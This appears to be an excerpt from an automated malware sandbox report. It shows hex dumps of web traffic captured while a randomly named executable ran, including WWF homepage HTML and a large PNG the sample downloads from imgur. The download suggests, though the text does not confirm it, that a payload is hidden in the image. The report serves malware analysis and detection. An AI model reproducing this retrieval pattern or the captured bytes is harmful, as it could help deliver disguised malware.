                                                                                                                                                    2023-09-05 11:01:21 UTC50INData Raw: 2f 73 70 61 6e 3e 0a 3c 2f 68 33 3e 0a 3c 70 3e 43 68 61 6d 70 69 6f 6e 69 6e 67 20 74 68 65 20 72 65 73 69 6c 69 65 6e 63 65 20 6f 66 20 77 6f 6d 65 6e 2c 20 63 6f 6d 6d 75 6e 69 74 69 65 73 2c 20 61 6e 64 20 65 63 6f 73 79 73 74 65 6d 73 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64 3d 22 61 72 74 69 63 6c 65 5f 62 6c 6f 63 6b 5f 37 34 39 36 62 30 22 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 73 74 6f 72 79 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 73 74 6f 72
                                                                                                                                                    Data Ascii: /span></h3><p>Championing the resilience of women, communities, and ecosystems</p></div></a></li><li id="article_block_7496b0" class="homepage-news__secondary__story"><a class="homepage-news__secondary__link" href="https://www.worldwildlife.org/stor
                                                                                                                                                    2023-09-05 11:01:21 UTC52INData Raw: 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 4f 70 70 6f 72 74 75 6e 69 74 79 5f 57 57 66 61 6c 6c 32 30 32 33 2f 31 34 34 30 78 35 38 30 5f 68 61 73 68 2f 32 39 30 39 37 75 72 68 33 30 5f 4f 70 70 6f 72 74 75 6e 69 74 79 5f 57 57 66 61 6c 6c 32 30 32 33 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 34 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 4f 70 70 6f 72 74 75 6e 69 74 79
                                                                                                                                                    Data Ascii: 0px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Opportunity_WWfall2023/1440x580_hash/29097urh30_Opportunity_WWfall2023.jpg" media="(min-width: 1440px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Opportunity
                                                                                                                                                    2023-09-05 11:01:21 UTC53INData Raw: 32 3e 0a 3c 70 3e 0a 41 20 6e 65 77 20 70 72 6f 67 72 61 6d 20 77 69 6c 6c 20 70 72 6f 76 69 64 65 20 74 72 61 69 6e 69 6e 67 2c 20 73 75 70 70 6f 72 74 2c 20 61 6e 64 20 66 69 6e 61 6e 63 69 6e 67 20 74 6f 20 68 65 6c 70 20 77 6f 6d 65 6e 20 66 69 6e 64 20 6e 65 77 20 77 61 79 73 20 74 6f 20 65 61 72 6e 20 69 6e 63 6f 6d 65 20 77 68 69 6c 65 20 63 61 72 69 6e 67 20 66 6f 72 20 74 68 65 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 0a 3c 2f 70 3e 0a 3c 70 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 73 69 6d 70 6c 65 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 6d 61 67 61 7a 69 6e 65 2f 69 73 73 75 65 73 2f 66 61 6c 6c 2d 32 30 32 33
                                                                                                                                                    Data Ascii: 2><p>A new program will provide training, support, and financing to help women find new ways to earn income while caring for the environment</p><p><a class="btn btn-simple homepage-button" href="https://www.worldwildlife.org/magazine/issues/fall-2023
                                                                                                                                                    2023-09-05 11:01:21 UTC54INData Raw: 65 2d 69 6d 70 61 63 74 5f 5f 6c 69 6e 6b 73 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 73 69 6d 70 6c 65 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 5f 5f 31 20 2d 66 69 6c 6c 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 32 37 31 36 2f 61 63 74 69 6f 6e 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 6f 6e 61 74 69 6f 6e 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 48 6f 6d 65 70 61 67 65 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 3d 41 57 45 32 34 30 32 4f 51 32 30 32 33 33 41 30 36 30 37 39 52 58 22 3e 44
                                                                                                                                                    Data Ascii: e-impact__links"><a class="btn btn-simple homepage-button homepage-button__1 -filled" href="https://protect.worldwildlife.org/page/52716/action/1?en_og_source=Web_Donation&amp;ea.tracking.id=Web_Homepage&amp;supporter.appealCode=AWE2402OQ20233A06079RX">D
                                                                                                                                                    2023-09-05 11:01:21 UTC59INData Raw: 5f 5f 74 69 74 6c 65 20 77 77 66 20 68 6f 6d 65 70 61 67 65 5f 5f 68 65 61 64 69 6e 67 20 2d 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 2d 6c 61 72 67 65 22 3e 0a 4a 6f 69 6e 20 6f 75 72 20 63 6f 6d 6d 75 6e 69 74 79 0a 3c 2f 68 32 3e 0a 3c 70 3e 0a 47 65 74 20 74 68 65 20 6c 61 74 65 73 74 20 63 6f 6e 73 65 72 76 61 74 69 6f 6e 20 75 70 64 61 74 65 73 2c 20 62 65 20 69 6e 73 70 69 72 65 64 20 74 6f 20 74 61 6b 65 20 61 63 74 69 6f 6e 2c 20 61 6e 64 20 6c 65 61 72 6e 20 61 62 6f 75 74 20 77 61 79 73 20 74 6f 20 67 65 74 20 69 6e 76 6f 6c 76 65 64 0a 3c 2f 70 3e 0a 3c 70 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 73 69 6d 70 6c 65 20 68 6f 6d 65 70 61 67 65 2d 62 75 74 74 6f 6e 20 2d 68 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                    Data Ascii: __title wwf homepage__heading -no-underline -large">Join our community</h2><p>Get the latest conservation updates, be inspired to take action, and learn about ways to get involved</p><p><a class="btn btn-simple homepage-button -hollow" href="https:
                                                                                                                                                    2023-09-05 11:01:21 UTC63INData Raw: 38 78 35 39 31 32 5f 4d 65 64 69 75 6d 5f 57 57 31 34 37 35 34 31 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 34 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 4c 61 6e 64 6f 77 6e 65 72 5f 4d 6f 7a 61 6d 62 69 71 75 65 5f 4a 61 6d 65 73 5f 4d 6f 72 67 61 6e 5f 57 57 31 34 37 35 34 31 2f 31 32 30 30 78 34 38 33 5f 68 61 73 68 2f 6a 66 68 66 6e 6d 69 38 5f 4d 65 64 69 75 6d 5f 57 57 31 34 37 35 34 31 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22
                                                                                                                                                    Data Ascii: 8x5912_Medium_WW147541.jpg" media="(min-width: 1440px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Landowner_Mozambique_James_Morgan_WW147541/1200x483_hash/jfhfnmi8_Medium_WW147541.jpg" media="(min-width: 1200px)"><source srcset="
                                                                                                                                                    2023-09-05 11:01:21 UTC67INData Raw: 5f 69 6e 5f 74 68 65 5f 59 61 6e 67 74 7a 65 5f 52 69 76 65 72 5f 42 61 73 69 6e 5f 43 68 69 6e 61 2f 34 33 30 78 32 38 37 5f 68 61 73 68 2f 32 6d 78 69 64 38 76 36 30 35 5f 5f 57 57 32 34 33 36 37 30 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 22 3e 0a 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 54 72 61 64 69 74 69 6f 6e 61 6c 5f 74 65 61 5f 63 65 72 65 6d 6f 6e 79 5f 61 74 5f 48 61 70 70 79 5f 46 61 72 6d 68 6f 75 73 65 5f 49 6e 69 74 69 61 74 69 76 65 5f 61 6e 64 5f 72 75 72 61 6c 5f 77 61 74 65 72 5f 73 65 63 75 72 69 74 79 5f 69 6e 5f 74 68 65 5f 59
                                                                                                                                                    Data Ascii: _in_the_Yangtze_River_Basin_China/430x287_hash/2mxid8v605__WW243670.jpg" media="(min-width: 768px)"><source srcset="https://files.worldwildlife.org/wwfcmsprod/images/Traditional_tea_ceremony_at_Happy_Farmhouse_Initiative_and_rural_water_security_in_the_Y
                                                                                                                                                    2023-09-05 11:01:21 UTC71INData Raw: 22 66 6f 6f 74 65 72 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 5f 5f 6d 6f 62 69 6c 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6c 69 73 74 2d 63 61 74 65 67 6f 72 79 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 22 3e 44 69 73 63 6f 76 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 46 6f 6f 74 65 72 20 43 6c 69 63 6b 7c 57 68 6f 20 77 65 20 61 72 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 61 62 6f 75 74 2f 22 3e 57 68 6f 20 77 65 20 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d
                                                                                                                                                    Data Ascii: "footer-flex-container__mobile"><ul class="footer-list-category"><li class="category">Discover</li><li><a data-track-event="Homepages Show|Footer Click|Who we are" href="https://www.worldwildlife.org/about/">Who we are</a></li><li><a data-track-event=
                                                                                                                                                    2023-09-05 11:01:21 UTC74INData Raw: 33 30 63 38 0d 0a 69 76 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6c 69 73 74 2d 63 61 74 65 67 6f 72 79 20 66 6f 6f 74 65 72 2d 62 72 2d 62 6f 74 74 6f 6d 5f 5f 6d 6f 62 69 6c 65 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 2d 63 61 74 65 67 6f 72 79 22 3e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 75 73 3c 2f 6c 69 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 6e 61 76 2d 73 6f 63 69 61 6c 22 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 66 75 6e 64 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 53 6f 63 69 61 6c 20 4f 75 74 62 6f 75 6e 64
                                                                                                                                                    Data Ascii: 30c8iv><ul class="footer-list-category footer-br-bottom__mobile"><li class="social-category">Connect with us</li><ul class="footer-nav-social"><li><a href="https://www.facebook.com/worldwildlifefund" data-track-event="Homepages Show|Social Outbound
                                                                                                                                                    2023-09-05 11:01:21 UTC78INData Raw: 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 20 31 38 2e 34 38 20 39 2e 32 34 20 39 2e 32 34 20 30 20 30 30 30 2d 31 38 2e 34 38 7a 4d 31 38 20 32 34 61 36 20 36 20 30 20 31 31 30 2d 31 32 20 36 20 36 20 30 20 30 31 30 20 31 32 7a 4d 32 39 2e 37 37 20 38 2e 34 61 32 2e 31 36 20 32 2e 31 36 20 30 20 31 31 2d 34 2e 33 32 20 30 20 32 2e 31 36 20 32 2e 31 36 20 30 20 30 31 34 2e 33 32 20 30 7a 22 20 66 69 6c 6c 3d 22
                                                                                                                                                    Data Ascii: .71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100 18.48 9.24 9.24 0 000-18.48zM18 24a6 6 0 110-12 6 6 0 010 12zM29.77 8.4a2.16 2.16 0 11-4.32 0 2.16 2.16 0 014.32 0z" fill="
                                                                                                                                                    2023-09-05 11:01:21 UTC83INData Raw: 73 69 74 65 2d 74 65 72 6d 73 22 3e 53 69 74 65 20 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 46 6f 6f 74 65 72 20 43 6c 69 63 6b 7c 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 2f 59 6f 75 72 20 50 72 69 76 61 63 79 20 52 69 67 68 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 73 2f 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 22 3e 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 2f 59 6f 75 72 20 50 72 69 76 61 63 79 20 52 69 67 68 74 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73
                                                                                                                                                    Data Ascii: site-terms">Site Terms</a></li><li><a class="copyright" data-track-event="Homepages Show|Footer Click| Privacy Policy/Your Privacy Rights" href="https://www.worldwildlife.org/pages/privacy-policy"> Privacy Policy/Your Privacy Rights</a></li><li><a class
                                                                                                                                                    2023-09-05 11:01:21 UTC87INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.449719199.232.32.193443C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2023-09-05 11:01:22 UTC87OUTGET /2lsHcHC.png HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Host: i.imgur.com
                                                                                                                                                    2023-09-05 11:01:22 UTC87INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 700022
                                                                                                                                                    Content-Type: image/png
                                                                                                                                                    Last-Modified: Mon, 21 Aug 2023 18:51:45 GMT
                                                                                                                                                    ETag: "0b2cb14b545e79b0507a81337e2ac265"
                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                    X-Amz-Cf-Pop: IAD89-P1
                                                                                                                                                    X-Amz-Cf-Id: uny_SonXUREQ6MMZRScqsxqq_EUp4VWR0uKSaLa2nyvn3mPYLHtjXw==
                                                                                                                                                    cache-control: public, max-age=31536000
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:01:22 GMT
                                                                                                                                                    Age: 547
                                                                                                                                                    X-Served-By: cache-iad-kiad7000049-IAD, cache-fty21374-FTY
                                                                                                                                                    X-Cache: Miss from cloudfront, HIT, MISS
                                                                                                                                                    X-Cache-Hits: 4, 0
                                                                                                                                                    X-Timer: S1693911683.577999,VS0,VE26
                                                                                                                                                    Strict-Transport-Security: max-age=300
                                                                                                                                                    Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Server: cat factory 1.0
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    2023-09-05 11:01:22 UTC87INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a7 00 00 02 55 08 02 00 00 00 f5 3f ad 40 00 00 20 00 49 44 41 54 78 9c ec bd 77 98 5b d7 75 e8 bb 71 d0 7b ef bd 0c 06 c0 60 fa 70 1a c9 61 15 3b a9 6e 49 6e 72 62 3b b6 e5 38 71 72 73 f3 ee 1f f7 e5 e5 f9 25 f1 bd 37 f7 4b 9c 6b c7 89 2d d9 96 64 f5 ce 36 ec e4 b0 cc 70 fa 0c 38 0d d3 80 41 ef bd e3 e0 e0 bc 3f 8e 34 99 90 14 25 db 24 4d 4b f8 7d fc f4 01 38 fb ac bd cf c2 9e ad 8d b5 f6 5a 0b 17 8b 46 40 8d 1a 35 6a 7c 6e 80 7e df 03 a8 51 a3 46 8d fb 4a 6d d5 ab 51 a3 c6 e7 8b da aa 57 a3 46 8d cf 17 84 df f7 00 6a 7c 5e 60 1f 13 fc be 87 50 e3 b3 4f ea 48 f4 13 db d4 f6 7a 35 6a d4 f8 7c 51 db eb d5 b8 af e0 ff e8 f7 3d 82 1a 9f 51 90 5f 01 00 00 5f 20 fc c4 73 29 b5 bd 5e 8d 1a 35 3e 5f d4 56
                                                                                                                                                    Data Ascii: PNGIHDRU?@ IDATxw[uq{`pa;nInrb;8qrs%7Kk-d6p8A?4%$MK}8ZF@5j|n~QFJmQWFj|^`POHz5j|Q=Q__ s)^5>_V
                                                                                                                                                    2023-09-05 11:01:22 UTC103INData Raw: c3 e1 76 3f f4 d0 ff fe c7 ff b9 65 eb 56 00 00 99 4c 12 89 44 91 48 94 cb e5 99 4c 66 00 40 43 83 f5 ad 37 df 94 4a a5 34 3a ad c1 da 20 97 2b b6 6c dd 3a 3d 8b 7c d4 3d 00 00 20 00 49 44 41 54 c6 a5 79 ea b5 12 4b 03 09 60 0a 00 63 5a 0d 00 b0 ae 4b 03 b5 12 43 13 92 12 4b 0f d2 a2 4b 93 b5 12 4a 02 b5 45 4b 03 c6 12 26 03 f4 12 3e b3 b5 66 4b 6c b6 ba 57 03 90 12 11 a9 e5 12 49 47 b5 1c 1f 03 b3 37 69 69 b4 01 df 74 dc 7c 2f 6a c7 37 4b 5f e6 6b 38 54 fa 45 7d 03 81 4e 28 6e d1 3c 2e 7b b3 77 7c 51 95 71 26 70 dd 66 26 23 d9 3c 2f 6f d9 d7 7a 56 3e 12 a7 80 59 02 21 07 dd e2 4b 02 b5 12 a3 bd 81 12 4b 03 36 d6 43 8a f0 ee c0 46 95 ee 1b eb 9a 04 4a 04 b1 7a 4b 8b a6 12 4b 88 f8 ee 1a 0b 5d 0c 7a 81 ba 99 1e ff e7 1a a3 11 f2 10 45 8a f0 e2 c8 83 c8 e2
                                                                                                                                                    Data Ascii: v?eVLDHLf@C7J4: +l:=|= IDATyK`cZKCKKJEK&>fKlWIG7iit|/j7K_k8TE}N(n<.{w|Qq&pf&#</ozV>Y!KK6CFJzKK]zE
                                                                                                                                                    2023-09-05 11:01:22 UTC119INData Raw: e3 2a ee 3a 49 e5 fa 0a c9 e6 49 08 39 74 e7 1a 0f e5 78 4e a1 a6 99 4d 13 a7 1f 38 4b 36 28 4b 76 bc 7a 8c 46 49 80 4f 04 35 12 89 89 f0 84 b7 34 b1 e0 48 1f 23 13 43 26 d5 12 1f 23 c1 22 48 ef 80 11 a7 00 3b fe 5f 8a f8 02 4e 0b 0c 37 84 bf 00 00 20 00 49 44 41 54 c5 0f 4b 03 f5 07 4a 01 5d 17 49 eb 16 11 a3 8a f0 40 bf 13 bd 93 aa d3 b5 92 4a 01 51 17 4e 01 51 10 49 56 51 9b 1e f3 b5 91 36 fb b5 67 53 80 c8 12 bf 03 c0 00 c8 7e 45 12 2f 76 b9 c6 42 ea 74 52 4b de b4 66 9e d2 b4 1a 9a 02 16 c8 4a 77 02 11 ab 5d 63 12 59 5d 67 13 5e d1 b4 1d f9 00 c4 1d e1 07 a4 1a 21 a2 b4 66 e9 02 c0 b0 4a e0 97 03 2b 11 b5 f9 04 ae b4 40 48 82 9d 2e a0 37 12 13 48 06 e7 11 9b 43 b5 f9 21 1a 17 13 58 a1 b4 1f 19 00 14 07 0b 8a b2 06 4f 77 f5 30 b7 82 7c d3 23 24 84 33
                                                                                                                                                    Data Ascii: *:II9txNM8K6(KvzFIO54H#C&#"H;_N7 IDATKJ]I@JQNQIVQ6gS~E/vBtRKfJw]cY]g^!fJ+@H.7HC!XOw0|#$3
                                                                                                                                                    2023-09-05 11:01:22 UTC135INData Raw: a8 38 46 6f 27 a9 ad 49 1a bf a9 8a 58 3e d3 43 80 54 0d cb 0a 66 f1 c0 0f a5 94 c6 07 33 52 09 08 7e 5d 4b 8a bd 67 94 88 70 ad 6b 06 b4 1a 83 c1 bc d3 b2 06 38 06 53 8d 3e da eb 06 f5 17 41 08 7e 13 e9 01 3c 18 c6 4b b4 99 9a 86 f4 1a b1 41 bd 84 c6 17 23 32 45 0b 42 c1 68 83 bd 18 3e c1 72 c9 8b 3d b8 bc 21 9c 00 00 20 00 49 44 41 54 b4 17 78 a3 9b b2 53 3e 71 07 cf 09 b0 91 42 cb d5 19 ce 1f 3b 66 49 03 3e ea c0 09 3e 4e 6f 13 b5 39 80 7a b7 11 86 88 29 11 49 1d d7 21 8e 8a 89 99 37 c9 b0 92 42 17 b7 5f 84 fc 38 55 4a 21 0a d0 5c cb 3e c2 ef 0c 52 97 4b 3f 23 66 50 86 7c 66 5c c1 f5 43 48 76 50 99 83 e1 b7 b2 46 01 3e 37 52 e4 30 e8 3f 43 36 12 b1 fc c0 1c c8 c3 95 99 49 d3 d5 17 c8 3f 23 ed 3f f1 9d 99 83 b9 50 01 a9 e0 a6 06 c5 0c 55 18 c9 01 96 15
                                                                                                                                                    Data Ascii: 8Fo'IX>CTf3R~]Kgpk8S>A~<KA#2EBh>r=! IDATxS>qB;fI>>No9z)I!7B_8UJ!\>RK?#fP|f\CHvPF>7R0?C6I?#?PU
                                                                                                                                                    2023-09-05 11:01:22 UTC151INData Raw: f6 e1 07 98 10 d7 45 f9 8b e4 fa c3 43 d1 52 41 50 f1 fa 07 63 bc 44 a3 45 76 1b a2 a1 29 53 11 7f 91 42 84 8a c7 52 f9 d6 7d 9b 66 41 e9 d4 8a 25 bf a0 48 93 a1 e8 4a a1 b1 e9 cb 01 15 16 c9 24 93 07 6e 06 9b 41 14 86 e3 97 9f 87 a9 41 cf eb 06 e9 4a 04 37 20 e2 92 b5 c2 cd 02 d5 32 53 33 e5 12 0e 6b 3c 57 27 8a f0 62 c0 d1 f4 d3 2e f4 45 4a c0 56 89 61 0a bf 5c fb 9b 03 4e 13 c6 32 00 00 20 00 49 44 41 54 87 6e 4b 17 a5 11 1f 43 2f 26 d8 f1 83 6e 80 b1 ee e3 38 fb 4a ba 44 86 9e f3 00 3e d4 69 f5 62 ce 12 c0 c4 3f 02 c1 c9 8f 04 4b 76 a9 96 82 77 a1 98 1b 91 b4 d2 4b 55 b4 22 30 c3 b7 72 30 13 31 db 3e e3 8c 69 6a 6b cd 3f 79 78 6f f1 22 f3 a3 1d 3c 78 5c cb dc 91 94 97 30 13 b9 02 2b 67 9f a5 23 67 8f 76 27 67 fe 73 47 b6 a7 61 5c f9 03 29 33 14 25 d5
                                                                                                                                                    Data Ascii: ECRAPcDEv)SBR}fA%HJ$nAAJ7 2S3k<W'b.EJVa\N2 IDATnKC/&n8JD>ib?KvwKU"0r01>ijk?yxo"<x\0+g#gv'gsGa\)3%
                                                                                                                                                    2023-09-05 11:01:22 UTC167INData Raw: d2 bd fb 76 d7 f5 13 35 ea 3e 1f 09 c7 95 0f 2d c4 b4 13 4b 5d 88 b0 37 33 b4 12 3e 37 25 12 cb 91 b5 98 61 93 b5 9e d9 03 95 aa 93 73 b5 07 b9 00 a0 d3 3f 5b 35 3e 37 f3 3e f4 5e d0 b6 52 34 c0 14 b1 4b 63 bd 0a 2c 80 04 20 79 30 e1 36 47 a0 01 b0 76 4b 3c 1f 83 83 b7 b1 fb c3 b5 9b 6f 16 dd 52 28 a0 75 52 52 a0 71 3f 0b 03 76 e2 df 72 b5 44 9b 72 bd 45 4f 88 88 93 4a 88 73 c1 ab 08 f1 ea c2 b0 b5 6e 6f 13 f5 35 b2 47 a5 9b 29 01 cb 68 c0 b1 1b 95 e1 ed 00 00 20 00 49 44 41 54 b1 b3 4a b2 b1 5b 70 c2 c7 06 c0 16 b0 23 4d 6b 44 12 19 eb 05 43 4a 26 a4 03 ea 22 b4 99 5e 32 b4 98 46 72 e4 16 c3 0f a5 00 48 c0 b7 92 51 0e bf d3 1b 02 f5 00 42 8b b9 10 ea 00 14 17 b8 01 36 fa 5b 88 7a 50 03 28 7d 9b 99 03 66 fc 09 09 3c a0 7e 42 b1 4d 15 51 bb 62 46 0b 45 1f
                                                                                                                                                    Data Ascii: v5>-K]73>7%as?[5>7>^R4Kc, y06GvK<oR(uRRq?vrDrEOJsno5G)h IDATJ[p#MkDCJ&"^2FrHQB6[zP(}f<~BMQbFE
                                                                                                                                                    2023-09-05 11:01:22 UTC183INData Raw: 05 1c 12 4d 41 59 7a 59 1f 14 17 69 f4 b7 3e 53 53 dd 06 b3 06 75 13 58 c2 b4 5e 6f 23 7d 43 a3 b8 55 17 23 c7 d5 10 2b 23 a1 ff a4 a1 99 3e 0b 28 e7 fa e9 46 b1 1b 2b 03 bc d5 4e 67 10 56 1a a8 75 13 2b 7d e1 52 c8 23 b7 10 0b 22 a6 1b 6b 08 42 ca 4b 35 55 10 e8 c3 e0 63 0d 28 f7 11 d3 46 b6 0e ab 03 88 30 6f a3 b5 1d cc 0b 05 5f 44 87 b7 e1 5b 15 38 5a cd 82 4c bb 1a f2 eb 95 96 0a f6 4f bf 40 e8 b2 9a 63 b5 d5 4e 73 60 11 95 d3 b4 91 1d 6b 72 17 27 46 b4 db 0b 02 a5 1e 53 03 86 d2 70 c8 ba 86 8b a0 2f 06 5a 4b 81 46 8c 29 00 00 20 00 49 44 41 54 01 53 4a b3 bd 21 82 c3 f2 b2 df c2 3c 1f 5b 52 b4 8c 1f 02 bd 9b 56 1b a6 5e 5a 8a a8 1a 1e 81 c7 1e aa 02 ca f3 4a 16 b4 13 ea 42 44 12 40 d3 5e 3a 72 a3 32 66 19 08 46 10 a2 5c 45 13 ea e2 b4 99 79 0e 44 13
                                                                                                                                                    Data Ascii: MAYzYi>SSuX^o#}CU#+#>(F+NgVu+}R#"kBK5Uc(F0o_D[8ZLO@cNs`kr'FSp/ZKF) IDATSJ!<[RV^ZJBD@^:r2fF\EyD
